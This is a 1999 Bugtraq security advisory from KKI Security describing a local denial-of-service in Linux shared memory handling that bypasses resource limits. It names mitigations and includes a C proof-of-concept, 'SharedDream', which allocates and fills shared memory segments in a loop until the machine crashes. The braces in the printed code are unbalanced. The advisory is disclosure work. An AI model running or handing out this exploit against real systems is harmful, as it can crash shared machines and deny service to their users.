Date: Tue, 14 Sep 1999 16:20:21 +0200
From: "=?iso-8859-2?Q?Robert_'Shadow'_Paj=B1k?=" <shadow@kki.pl>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
KKI Security Team Cracow Commercial Internet
http://www.security.kki.plhttp://www.kki.pl
mailto:security@security.kki.pl mailto:biuro@kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Raport title : Shared Memory DoS - IPC vulnerability (Linux
abuse as example)
Problem found by : Robert Pajak (shadow@security.kki.pl),
probably other ppl found that first - one of them is
lcamtuf, Solar Designer is probably other...
Raport created by : Robert Pajak (shadow@security.kki.pl)
Lukasz Luzar (lluzar@security.kki.pl)
Raport published : 14 September, 1999
Raport code : KKIS.14091999.004.b
Vulnerable programs : system vulnerability...
Systems affected : Linux, other (?) ...
Archive : http://www.security.kki.pl/advisories/
Risk level : high
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Useing attached program one can DoS machine even when limits are set
up...
This is due to fact that shared memory segments can exist without
beeing bind with processes. To protect you should diable this
operations, or use Solar Designer's stack patch with limits set,
etc...
Alan Cox has been notified...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Local Denial of Services attack - simple bypassing limits...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
/* SharedDream - (c) Shadow, KKI Security */
/* */
/* I'm not responsible for any damaged done by this proggie... */
/* It should be used only for education... */
/* To protect - use brain, Solar's patches, or whatever... */
/* This problem is because shared memory segments can exist even */
/* if they are not combined with programs! */
/* !This program will crash your machine (localy) at kernels 2.x! */
/* If you are on kernels 2.2.x with limits run it twice :) */
/* really - even when rescource limits are set! :) */
/* Probably original idea by lcamtuf */
/* heck you should told me that you found it */
/* first ;) */
/* heh - worm greetings for for Coding Style ;) */
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#define BOLD "\033[00;04m"
#define BLUE "\033[00;36m"
#define STAN "\033[00;00m"
void main(void)
{
char *p;
int i = 10000000;
printf("\n\n");
printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments
abuser\n");
printf(BOLD "*)\n" STAN);
printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD
"shadow@security.kki.pl" STAN ")\n");
printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me),
lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i
forgot to mention\n" STAN);
printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to
be limited\n");
printf(BOLD "*)" STAN " Starting...");
fflush(stdout);
while (1)
if (p = shmat(shmget(0, i, 0777), 0, 0))
memset( p,'\0',i); // need to touch
memory somehow
printf(".DoW.");
fflush(stdout);
}
else {
i--;
}
}
exit(0);
}
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright
statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
